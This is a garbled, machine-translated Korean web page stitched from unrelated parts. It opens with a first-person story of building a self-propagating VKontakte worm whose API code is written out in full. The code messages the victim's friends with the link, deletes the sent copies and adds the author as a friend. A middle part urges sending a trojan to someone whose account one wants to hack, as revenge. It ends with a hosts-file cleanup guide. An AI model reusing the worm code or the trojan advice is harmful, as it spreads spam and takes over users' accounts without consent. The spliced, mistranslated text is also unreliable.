또 어느 날 나는 컴퓨터 앞에 앉아 무엇을 해야 할지 몰랐습니다. 내 피드를 스크롤하면서 이미 본 어제 게시물로 돌아왔습니다. 내 페이지에 접속했을 때 나는 속으로 이렇게 생각했습니다. “맙소사, 구독자 수가 160명밖에 안 되네요. 얼마나 적은데..." 그리고 즉시 "어떻게 증가시킬 수 있습니까? "라는 질문이 생겼습니다. 부정 행위는 모든 사람의 마음에 올 것이 분명합니다. 그러나 이를 위해서는 돈이 필요하거나 무엇이든 구독, 재게시 또는 좋아요를 누르는 데 많은 시간을 소비해야 합니다. 이것은 선택 사항이 아니었습니다.
나중에 잠자리에 들기 전에 이를 수행하는 방법에 대한 아이디어가 떠올랐습니다. 그 아이디어는 거의 모든 인터넷 사용자가 받게 될 바이러스성 링크였습니다.
아침에 일어나 커피를 마시며 이 아이디어를 실천하기 시작했습니다. VK API에서 사용자를 대신하여 요청을 수행하려면 access_token이 필요하다는 사실은 오랫동안 많은 사람들에게 비밀이 아니었습니다. 하지만! ~에 사이트 자체이 키는 단순히 테스트하는 데 필요한 것이 아닙니다. 이 슈퍼 바이러스를 만들기 전에 그 기능을 확인하고 싶었습니다.
테스트를 위해 나는 방법을 사용했습니다. 친구 추가 user_id 필드에 ID를 입력했습니다. 이렇게 하면 주소 표시줄이 다음과 같이 변경됩니다.
나는 vk.cc를 통해 이 링크를 단축하고 유혹적인 설명과 함께 두 인기 그룹에 대한 댓글에 남겨 두었습니다. 30분 후에 이미 구독자가 100명이 되었습니다. (더 많았어야 했는데 댓글이 삭제되고 차단당했습니다.) 그 이후로 하면 될 것 같다는 확신이 들어서 만들기 시작했어요.
VKontakte는 서버가 과부하되지 않도록 하나의 IP에서 API에 대한 액세스를 5초 간격으로 제한합니다. 그리고 잦은 요청으로 인한 문제를 해결하기 위해 방법을 만들었습니다. 실행하다. 이 방법을 사용하면 알고리즘을 저장하면서 여러 메서드를 동시에 호출할 수 있는데, 제가 사용한 방법입니다.
이 바이러스는 주로 사람들의 속임수, 즉 "사회 공학"에 의존합니다. 우리 각자는 아마도 친구가 보낸 메시지의 링크를 따라갈 것입니다. 이것이 바로 제가 세상을 노예로 삼아 이용하고 싶었던 것입니다.
몇 가지 장애물에 직면하면서 바이러스를 생성하는 데 약 하루가 걸렸습니다. 이에 대해서는 나중에 자세히 설명합니다. 바이러스는 다음과 같이 작동해야 했습니다.
- 사용자가 링크를 따라갔습니다.
- 이 메서드는 모든 친구 목록을 가져와서 등급별로 정렬합니다.
- "See /* link */"라는 텍스트가 포함된 메시지를 보냅니다.
- 보낸 사람에게서 메시지가 삭제되었습니다.
- 친구로 추가 및/또는 지정된 그룹에 가입합니다.
- 메시지를 받은 친구들은 링크를 따라가세요
- 처음부터 시작하자
Var a = API.friends.get(( // 모든 친구 목록을 가져오는 방법 "order": "hints" // 평점순 정렬 매개변수 )).items; // 목록만 가져옵니다. var b = 0; // 루프에 대한 변수 var d = 0; // 메시지 ID에 대한 변수 while (a[b])( d = API.messages.send(( // 메시지 전송 방법. 메시지 ID "user_id"를 반환합니다: a[b], // 수신자 "message": "Look /* link */ " // 메시지 텍스트 )); API.messages.delete(( // 메시지 ID "message_ids"로 삭제: d )) // b를 1만큼 늘립니다. (++ b 또는 b++는 작동하지 않습니다.) ) API.friends.add(( "user_id": "my id" ));
링크를 받은 후 나는 기쁜 마음으로 내 가짜 프로필에서 테스트해 보았습니다. 그러나 그것은 거기에 없었습니다. 링크를 클릭한 후 오류 12: 구문 오류가 발생했습니다. & 문자가 예상되지 않았습니다. 이것이 나의 장애물이 시작된 곳입니다.
결과적으로 XML 보호 서버는 모든 문자를 번역합니다. 그리고 큰따옴표 기호 "는 단순히 "es;로 번역되었으며 콘솔은
오류를 냈습니다. 작은따옴표는 번역되지 않지만 구문이 JSON에서 왔기 때문에 허용되지 않습니다.
(이 게시물과 같은) 취약점을 다루려는 첫 번째 시도이므로 시간이 조금 더 걸렸습니다. 처음 5시간은 따옴표 없이도 키를 전송할 수 있으며 따옴표 안에 숫자를 쓸 필요도 없다는 점을 이해하는 데 소요되었습니다. 저것들. 당신은 이것을 할 수 있습니다 :
API.friends.add(( user_id: 1234567 ));
좋아요, 문제의 절반이 해결되었습니다. 남은 문제는 단 하나였습니다. 정렬을 위해 메시지 텍스트와 "힌트"라는 단어를 전달하는 방법을 알아내야 했습니다.
참고로! 힌트 매개변수를 전달해야 하는 이유는 무엇입니까?
사실 메소드 테스트 페이지에서도 의심스러운 요청(예: 3 또는 7에서 메시지 보내기)이 있는 경우 보안문자를 입력해야 합니다. 메시지가 올바른 사람에게 전송된다는 것은 사실이 아닙니다. 따라서 이 매개변수를 전달하면 목록의 처음 3개가 링크를 따를 가능성이 90% 더 높도록 목록이 정렬됩니다.
마지막 문제를 해결하기 위해 정규식이나 그와 유사한 것을 사용하여 숫자 0을 문자열로 바꾸는 것을 생각했습니다. 저도 초보 웹개발자인데 어떻게 해야할지 몰라서 토스터기에 질문을 올렸습니다. 다양한 솔루션에 필요한 두 가지 답변을 받은 후 즉시 해당 솔루션을 사용하기로 결정했습니다. 그리고 여기서 또 문제가...
VKontakte API는 JavaScript가 아니며 교체() 또는 toString()과 같은 기능을 지원하지 않습니다. 그리고 일반적으로 var, return, while, if, else, 배열 및 비교 연산자를 제외하고 JS에서는 아무것도 지원하지 않습니다.
나는 다시 막다른 골목에 빠졌고 무엇을 해야할지 몰랐습니다. 나는 동료 프로그래머들에게 도움을 요청하는 것에 대해 말했습니다. “이건 정말 훌륭해, 친구!”라는 말과 함께. 그들은 나를 도와주기로 결정하고 API 문서를 조사하러 갔습니다.
이 문제를 해결하는 방법을 알아내는 데 오랜 시간이 걸렸습니다. 시간이 늦어서 나는 잠자리에 들었다. 잠자리에 들기 전에 나는 이 문제를 해결할 좋은 아이디어에 다시 한번 놀랐습니다.
다시 아침이다. 모닝 커피를 마신 후 가장 먼저 한 일은 바이러스를 지속하기 시작하는 것이었습니다.
해결책은 아주 간단했습니다. 결국 메소드에서 숫자나 변수를 전달할 때 따옴표로 묶을 필요가 없습니다.
내 가짜 프로필이 필요했어요. 거기에서 나는 다음 텍스트로 두 개의 다른 게시물을 만들었습니다.
- /* 링크 */를 참조하세요.
- 힌트
변수 b = 0; // 루프에 대한 변수 var d = 0; // 메시지 ID에 대한 변수 var m = API.wall.get(( owner_id: id, // 가짜 페이지 ID 개수: 1 // 게시물 1개만 반환 )).items.text; // 기사의 텍스트만 가져오기 var h = API.wall.get(( owner_id: id, // 가짜 페이지 수의 id: 1, // 1개의 게시물만 반환 offset: 1 // 게시물을 1씩 이동 ) ).items.text ; // 기사의 텍스트만 가져오기 var a = API.friends.get(( // 모든 친구 목록을 가져오는 방법 순서: h // 평점순으로 정렬하는 매개변수 )).items; // 목록만 가져옵니다 while (a[b])( d = API.messages.send(( // 메시지를 보내는 방법. 메시지 ID를 반환합니다. user_id: a[b], // 받는 사람 메시지: m // 메시지 text )) ; API.messages.delete(( // 메시지 ID로 메시지 삭제: d )); // b를 1만큼 늘립니다. (++b 또는 b++는 작동하지 않습니다.) ) API. friends.add(( "user_id": "내 ID" ));
링크를 받은 후 작동하는지 확인하고 만세! 모든 것이 제대로 작동했습니다. 가짜 페이지에서 친구 요청이 전송되었으며 평가에서 처음 7명의 친구에게 메시지가 성공적으로 전송되었습니다. 링크를 압축해서 첫 포스팅에 올려놓고 만족스러운 미소로 빅붐 준비했어요!
얼마나 많은 사람들이 링크를 따라갔는지 확인하기 위해 링크를 내 호스팅의 PHP 파일로 압축하여 데이터베이스에 방문을 기록하고 코드가 있는 메소드로 리디렉션했습니다.
흥미를 끌기 위해 매번 페이지를 새로 고치지 않고 댓글 하나를 작성한 후 즉시 VK를 떠났습니다. 한 시간쯤 지나서 다시 돌아왔는데, 데이터베이스에 올라온 항목 수를 보니 뿌듯함이 밀려왔습니다. 기쁨은 끝이 없었습니다! 5000개 이상의 전환. “그리고 이건 단 한 시간 안에! 둘 사이에 무슨 일이 일어날까요?” - 나 자신에게 질문을 했어요. 결국 이것은 해킹에 대한 나의 첫 경험이었습니다.
개인적으로 페이지에 얼마나 쌓였는지 확인해보고 사이트에 가보니 신규 구독자가 무려 3명이나 되었어요! 내가 놀라지 않았다고 말할 수는 없다. 아무것도 이해가 안됐는데... 데이터베이스에 라인이 5000개가 넘었는데 거의 모든 사람이 개인 IP를 가지고 있었고 구독자는 3명뿐이었습니다. 저는 사실 제가 2살이라고 생각했던 것만큼 똑똑하지 않다는 생각이 들기 시작했습니다. 몇 분 전, 그러한 사기 VK는 이미 보호를 받고 있습니다. 그런 생각을 하며 슬프게 떠났습니다.
벌써 2일이 지났네요. 잠자리에 들기 전에 나는 내 웹사이트를 확인하기로 결정했다. 나는 데이터베이스를 살펴보고 호기심에 통계 기록 테이블을 살펴 보았습니다. 이미 바이럴 링크를 통해 25,000건이 넘는 방문이 있었고, 구독자가 적은 이유는... 처음에 저를 시험 삼아 하신 분들도 구독을 취소하셨어요.
다시 잠자리에 들기 전, 왜 신규 가입자가 없고 클릭수가 늘어나고 있는지 드디어 이해하게 되었습니다.
모든 것이 코드에 있었습니다. 실행 메소드는 코드를 실행하고 알고리즘을 저장하며, 친구 추가 메소드는 맨 마지막에 있었습니다. 보안 문자를 입력할 때까지 추가 메소드가 실행되지 않았기 때문에 작동하지 않았습니다. 왜냐하면 내 모든 "피해자"에게는 친구가 8명 이상 있었고 자연스럽게 보안 문자가 실행되었으며 사용자는 무언가를 의심하여 탭을 닫았습니다. 녹음이 저장되고 메시지가 전송되었지만 더 이상 구독자를 위한 노예가 없었습니다.
즉시 침대에서 일어나 아침까지 구독자가 이미 만명을 넘을 수 있도록 빨리 고치기로 결정했습니다. 리디렉션 PHP 파일을 변경한 후 내일에 대한 행복한 생각을 가지고 잠자리에 들었습니다.
아침이 되니 커피도 마시지 않고 프로필을 확인한다. 만세! 구독자수가 적네요...
나는 다시 한 번 매우 놀랐다. 여전히 작동합니다. 이번에는 실제 프로필에서 링크의 기능을 확인해 보기로 했습니다. 메시지 삭제 코드를 삭제한 후 생성된 링크를 따라갔습니다. 개발자들은 이미 이 취약점을 해결한 것으로 나타났습니다. 전환을 위한 주소 표시줄의 코드가 더 이상 작동하지 않습니다.
나는 그들이 스스로 그것을 어떻게 알아 냈는지 모르겠습니다. 나는 여기서 천재다! 메시지가 도착했거나 내가 아는 프로그래머 중 한 명이 취약점에 대해 비밀리에 말한 것이 무엇이든 간에 나는 그것에 대해 결코 알지 못할 것입니다.
처음으로 대규모 네트워크에서 취약점을 발견할 수 있었기 때문에 여전히 기뻤습니다. 남들에겐 당연한 일이지만 나에게는 특별한 일이었다.
태그: VKontakte API, 취약점, 사회 공학
중지 계속
다른 사람의 계정에 접근하기 위한 기존 프로그램의 수가 너무 많아서 당황스러울 수 있습니다. 해당 검색어에 대해 Google과 Yandex는 서로 경쟁하며 바이러스 없이 VK를 해킹하는 가장 빠르고 안전한 방법을 약속하는 많은 링크를 제공합니다. 하지만 그 사람들을 믿을 수 있을까요?
이러한 앱의 대부분은 귀하에게 불리하게 작용합니다. 컴퓨터에 설치되면 즉시 촉수를 퍼뜨리고 비밀번호를 훔치며 제3자 계정을 해킹하는 활동만 시뮬레이션합니다. 따라서 매우 다채롭고 유혹적인 것을 설치하기 전에 프로그램 리뷰를주의 깊게 연구하십시오. 진정한 정보는 검색 엔진의 먼 페이지에 숨겨져 있습니다.
다른 사용자의 연락처를 해킹할 수 있는 신뢰할 수 있는 바이러스
연락처 해킹에 가장 효과적인 바이러스는 유비쿼터스 트로이 목마입니다. 신화 속의 트로이 목마처럼 이 프로그램도 다른 프로그램으로 가장하여 자신의 환심을 사려고 합니다. 악성 파일 작성자는 취약점 검색, 컴퓨터 속도 향상, 고유한 이모티콘 및 스티커를 약속하는 교활한 트릭을 많이 사용합니다. 이것은 매우 간단하고 다소 순진한 VK 해킹이지만 놀랍게도 실제로 작동합니다.
해킹하려는 계정의 사람에게 해당 바이러스를 보내십시오. 그리고 곧 그의 페이지에 액세스하거나 VKontakte 관리가 그의 페이지를 차단하도록 할 것입니다. 복수하는 영리한 방법.
오늘날 사용자는 VKontakte 소셜 네트워크에 대한 액세스가 다양한 유형의 바이러스 프로그램에 의해 차단된다고 불평하는 경우가 점점 더 많아지고 있습니다. 이 문제는 실제로 관련이 있으며 대부분의 사람들이 VKontakte 바이러스를 제거하는 방법을 모르기 때문에 발생합니다. 따라서 이 문제를 식별하고 해결하는 방법을 알아보고 이 기사가 도움이 될 것입니다.
VKontakte 바이러스 제거
대부분의 경우 사용자가 악성 링크를 클릭할 때 바이러스 감염이 발생합니다. 감염 후 얼마 후 소셜 네트워크에 로그인하면(경우에 따라 세션 중에) 다음과 같은 내용이 표시됩니다.
비문의 내용은 다를 수 있지만 이는 순수한 사기라는 점을 이해해야 합니다. 이러한 방식으로 사기꾼은 귀하로부터 돈을 벌려고 합니다. 양식에 전화번호를 입력하면 자동으로 유료 스팸 메일을 구독하게 될 가능성이 높기 때문입니다. 어떤 양식에도 데이터를 입력하지 않는 것이 매우 중요합니다. 바이러스 자체는 브라우저의 주소 표시줄에 필요한 Vk.com을 사기꾼이 이미 필요로 하는 것과 매우 유사한 도메인 이름(예: vksupp.ru)으로 대체합니다.
동시에 사기꾼에게는 VKontakte 지원 서비스를 사칭할 기회가 주어집니다. 불행하게도 최신 바이러스 백신도 악성 코드가 이미 컴퓨터에 침투했다면 탐지할 수 없습니다.
문제 해결 방법
위에서 언급했듯이 바이러스 백신은 악성 프로그램을 탐지할 수 없으므로 수동으로 처리해야 합니다. 하지만 두려워하지 마세요. 과정은 복잡하지 않고 시간도 많이 걸리지 않습니다. 시작하려면 로컬 드라이브 C를 엽니다. 폴더를 엽니다. 등, 다음 주소에 있습니다.
이 폴더에서 파일을 찾아 열어야 합니다. 호스트.
제안된 프로그램 목록에서 메모장을 선택하여 이 작업을 수행할 수 있습니다. 다음 텍스트가 당신 앞에 나타납니다.
파일 내용을 사진에 표시된 내용과 함께 주의 깊게 확인하시기 바랍니다. 그들은 달라서는 안됩니다. 불필요한 것을 모두 선택하고 의심없이 키를 누르십시오 삭제. 그런 다음 컴퓨터를 다시 시작하고 소셜 네트워크에서 계속 커뮤니케이션을 즐겨야 합니다.
문제 해결에 어려움이 있을 수 있음
1. Hosts 파일을 열 수 없는 경우가 있습니다. 오류가 발생하거나 아무 일도 일어나지 않습니다. 컴퓨터를 안전 모드로 부팅하면 이 문제를 해결할 수 있습니다.
